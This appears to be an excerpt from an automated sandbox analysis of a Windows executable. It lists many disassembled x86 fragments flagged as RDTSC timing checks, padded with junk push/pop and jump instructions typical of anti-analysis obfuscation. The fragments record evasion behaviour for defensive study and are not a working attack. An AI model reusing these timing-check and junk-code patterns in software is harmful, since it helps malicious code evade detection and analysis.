Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72E095 second address: 72E0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8C5451FBB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72E0A1 second address: 72E0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72E0A6 second address: 72E0C1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8C5451FBB8h 0x00000008 jns 00007F8C5451FBBAh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72E0C1 second address: 72E0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72E0C5 second address: 72E0F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC7h 0x00000007 jmp 00007F8C5451FBC1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72E0F5 second address: 72E0FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72E0FB second address: 72E0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72E0FF second address: 72E103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72E103 second address: 72E109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72E35D second address: 72E366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72E65A second address: 72E65E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C4EF2 second address: 6C4EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C4EF6 second address: 6C4F65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8C5451FBC6h 0x0000000c jmp 00007F8C5451FBC9h 0x00000011 ja 00007F8C5451FBB6h 0x00000017 popad 0x00000018 pop edx 0x00000019 push eax 0x0000001a pushad 0x0000001b jmp 00007F8C5451FBBEh 0x00000020 jmp 00007F8C5451FBBCh 0x00000025 jmp 00007F8C5451FBBFh 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 733183 second address: 73318C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73318C second address: 7331A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8C5451FBB6h 0x0000000a popad 0x0000000b push edx 0x0000000c jmp 00007F8C5451FBBEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73333B second address: 73333F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73333F second address: 733362 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C5451FBB6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F8C5451FBC7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 733362 second address: 733367 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7334BB second address: 7334F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F8C5451FBC0h 0x0000000a pop edx 0x0000000b push ebx 0x0000000c push edi 0x0000000d jmp 00007F8C5451FBC3h 0x00000012 js 00007F8C5451FBB6h 0x00000018 pop edi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7334F0 second address: 7334F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 733925 second address: 73392A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 733AC1 second address: 733AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 733AC7 second address: 733ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 733ACB second address: 733B15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522435h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8C5452242Ch 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 jmp 00007F8C5452242Ch 0x00000019 popad 0x0000001a pushad 0x0000001b jnl 00007F8C5452242Eh 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73411D second address: 734121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 734121 second address: 734138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F8C54522426h 0x00000009 jnc 00007F8C54522426h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 734266 second address: 734282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 734282 second address: 73428B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73428B second address: 734294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E5707 second address: 6E570B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E570B second address: 6E5717 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E5717 second address: 6E571D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E571D second address: 6E5721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E5721 second address: 6E5725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BC7D3 second address: 6BC7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BC7D7 second address: 6BC7DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BC7DD second address: 6BC7F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jg 00007F8C5451FBB6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 732EC9 second address: 732ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704864 second address: 70487B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C5451FBC3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70487B second address: 704907 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D2786h], ebx 0x0000000f jmp 00007F8C54522430h 0x00000014 lea eax, dword ptr [ebp+12484604h] 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F8C54522428h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 jnp 00007F8C54522434h 0x0000003a jmp 00007F8C5452242Eh 0x0000003f jnp 00007F8C54522428h 0x00000045 mov edx, ecx 0x00000047 nop 0x00000048 jmp 00007F8C54522434h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F8C54522430h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704907 second address: 6E4B95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a cld 0x0000000b call dword ptr [ebp+122D31F8h] 0x00000011 push edx 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704DD5 second address: 704DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704ECA second address: 704EEA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 2DAE31F9h 0x0000000f xor edi, dword ptr [ebp+122D31AEh] 0x00000015 push 27B973BEh 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f pop edi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704F69 second address: 704F79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C5452242Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 705108 second address: 70510D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 705349 second address: 70537D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C54522430h 0x00000008 jmp 00007F8C54522437h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70537D second address: 705383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 705383 second address: 7053C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F8C54522426h 0x00000009 jnp 00007F8C54522426h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 pushad 0x00000014 mov ax, dx 0x00000017 popad 0x00000018 push 00000004h 0x0000001a mov edx, 5F45FD14h 0x0000001f nop 0x00000020 push eax 0x00000021 pushad 0x00000022 jns 00007F8C54522426h 0x00000028 push edx 0x00000029 pop edx 0x0000002a popad 0x0000002b pop eax 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F8C54522431h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7053C3 second address: 7053C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70578F second address: 7057E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F8C54522439h 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F8C54522428h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov ecx, dword ptr [ebp+122D2DE0h] 0x00000033 push 0000001Eh 0x00000035 mov di, si 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7057E9 second address: 7057ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7057ED second address: 7057F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 705ACD second address: 705AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 705BE7 second address: 6E56D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F8C54522428h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 pushad 0x00000022 mov bl, F4h 0x00000024 mov bl, 29h 0x00000026 popad 0x00000027 or dh, FFFFFF95h 0x0000002a lea eax, dword ptr [ebp+12484648h] 0x00000030 mov dh, 79h 0x00000032 push eax 0x00000033 push ebx 0x00000034 jp 00007F8C5452242Ch 0x0000003a pop ebx 0x0000003b mov dword ptr [esp], eax 0x0000003e jmp 00007F8C5452242Ah 0x00000043 lea eax, dword ptr [ebp+12484604h] 0x00000049 jnl 00007F8C5452242Dh 0x0000004f jbe 00007F8C54522427h 0x00000055 clc 0x00000056 nop 0x00000057 ja 00007F8C5452242Ah 0x0000005d push eax 0x0000005e pushad 0x0000005f jmp 00007F8C54522432h 0x00000064 jmp 00007F8C54522435h 0x00000069 popad 0x0000006a nop 0x0000006b jmp 00007F8C54522431h 0x00000070 call dword ptr [ebp+122D3253h] 0x00000076 jnl 00007F8C5452244Eh 0x0000007c push eax 0x0000007d push edx 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E56D0 second address: 6E56DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8C5451FBB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E56DA second address: 6E5707 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C54522434h 0x0000000b pushad 0x0000000c push edi 0x0000000d jbe 00007F8C54522426h 0x00000013 jns 00007F8C54522426h 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7387C7 second address: 738800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C5451FBC4h 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c pushad 0x0000000d jc 00007F8C5451FBB6h 0x00000013 jmp 00007F8C5451FBBEh 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 738C10 second address: 738C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73907F second address: 739089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 739089 second address: 73908F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73908F second address: 73909A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73909A second address: 73909E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AF122 second address: 6AF151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C5451FBC0h 0x00000009 jmp 00007F8C5451FBC9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AF151 second address: 6AF172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8C54522438h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AF172 second address: 6AF176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 741AA1 second address: 741AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 741F97 second address: 741FC2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F8C5451FBC8h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749EEB second address: 749EF1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749EF1 second address: 749EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749EFA second address: 749F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8C54522426h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B9158 second address: 6B9194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C5451FBBBh 0x00000009 popad 0x0000000a pop edi 0x0000000b pushad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pushad 0x00000011 jmp 00007F8C5451FBC0h 0x00000016 jmp 00007F8C5451FBBFh 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749A7A second address: 749A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F8C54522433h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749A93 second address: 749AC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F8C5451FBC8h 0x00000008 pop edx 0x00000009 pushad 0x0000000a jmp 00007F8C5451FBBEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749AC0 second address: 749AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C5452242Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749BFC second address: 749C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7505C8 second address: 7505D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7505D0 second address: 7505D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7505D4 second address: 7505F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C5452242Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C54522432h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74FCD1 second address: 74FCD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75394D second address: 753953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753953 second address: 75395B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75395B second address: 753970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F8C54522426h 0x0000000e jng 00007F8C54522426h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753970 second address: 753978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753BF1 second address: 753BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8C54522426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753DAC second address: 753DB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753DB2 second address: 753DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753DB6 second address: 753DC0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C5451FBB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753DC0 second address: 753DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8C5452242Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753F15 second address: 753F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C5451FBBDh 0x00000009 jc 00007F8C5451FBB6h 0x0000000f popad 0x00000010 jmp 00007F8C5451FBC8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753F49 second address: 753F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
